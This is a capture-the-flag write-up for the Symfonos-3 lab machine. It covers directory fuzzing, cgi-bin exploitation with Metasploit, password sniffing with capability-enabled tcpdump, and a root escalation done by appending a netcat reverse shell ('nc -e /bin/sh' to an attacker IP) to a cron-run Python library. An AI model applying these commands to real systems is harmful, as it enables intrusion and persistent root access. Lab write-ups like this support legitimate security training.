Last updated: 15 Apr 24 09:34:22 (UTC)

Write-Up Symfonos-3

Symfonos-3

By Lawcky 21/01/24

Introduction

Symfonos-3

Difficulty : Medium

Additionnal info :

Name: symfonos: 3.1
Release date: 7 Apr 2020
Author: Zayotic
Series: symfonos

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

In this write-up

  • ftp
  • ffuf (a lot)
  • cgi-bin/ pentest (hacktricks)
  • metasploit
  • cewl
  • tcpdump capabilities
  • python module privesc

Write-UP

Enumerating

FTP

7f91092507102a4d2c9303b1f26e795a.png

HTTP

ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://192.168.1.42/FUZZ -fc 403 -e .php,.txt,.html

7e1aae0f3903a8d130d36bc687ef6289.png

491b96d6c34b0a9b5b37605112472334.png

ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.42/gate/FUZZ -fc 403

cd9d7f7a85f26fc2d91fa6ca64b1eb0f.png

84f457b81792046825e64eb2c8305876.png

fuzzing again

ffuf -w /usr/share/SecLists/Discovery/Web-Content/dirsearch.txt:FUZZ -u http://192.168.1.42/gate/cerberus/FUZZ -fc 403

527a76f597df4ad5c0f4aeb995041461.png

59fef2581d14fdd365735efaee020136.png

in the source code

570592e332d18bc6f968c1a94cd1a6db.png

ffuf -w /usr/share/SecLists/Discovery/Web-Content/dirsearch.txt:FUZZ -u http://192.168.1.42/gate/cerberus/tartarus/FUZZ -fc 403

fa956507fdfa18827b2123beddf43dc2.png

its a html page with a long text, some words are actual directories on the server but with a forbidden access, lets generate a wordlist using that page to then fuzz it

cewl -d 3 http://192.168.1.42/gate/cerberus/tartarus/research -w research.dic

hermes/
and charon/ found, but forbidden access,

lets try fuzzing inside these directories

found nothing passed this point seems to be a rabbithole

after searching i went back and fuzzed without filtering out 403 responses and found cgi-bin/ in the root of the server, lets try fuzzing this one

ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://192.168.1.42/cgi-bin/FUZZ

054d2a295e7b623970beb55d8e129615.png

3d7aa161f8c4df03f988c4c576858645.png

hacktrix page for cgi-bin

lets use metasploit for an automatic execution

0651a2a175c0348c164cdb8ade279b72.png

359621a30c47515424f026c3e6f7c088.png

after looking around i found the shell command that basically opens a shell

feb48ba459b85414cf16a20a7f53a631.png

we give ourself a better terminal and now lets try to privesc

Privilege Escalation

from cerberus to root

/usr/bin/tcpdump has capabilities set as cap_net_admin,cap_net_raw+eip

which can be exploited

by sniffing the loopback interface lo we can catch the password for other users

tcpdump -i lo -w file.pcap

then tcpdump -qns 0 -A -r file.pcap

885a83c01b2b648ec249ac1f4919f95f.png

hades:PTpZTfU4vxgzvRBE

7c8579548fa6e3cc92adb825b577b7a1.png

lets look at the ftp files

find / -type d -name '\*ftp\*' 2>/dev/null

found /opt/ftp

2cf8335325398fbd023c43614a55215a.png

7edf09faf8e6ae1e28dac59bfc04983a.png

this script is ran by root and is called by the cronjob but we cannot edit it

lets look for the module its calling

709a5c4e13456fe870f6fe3a003f5aec.png

we can edit the library to add a reverse shell into it and wait for the cronjob to run and give us a root shell

echo 'os.system("nc -e /bin/sh 192.168.1.253 8951")' >> /usr/lib/python2.7/ftplib.py

nc -lnvp 8951

after about 2 minutes

30b209d83be3112290fbe1a888ab8605.png

66ce5174db9e2859df8dca8ee5768ec9.png

got the flag

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.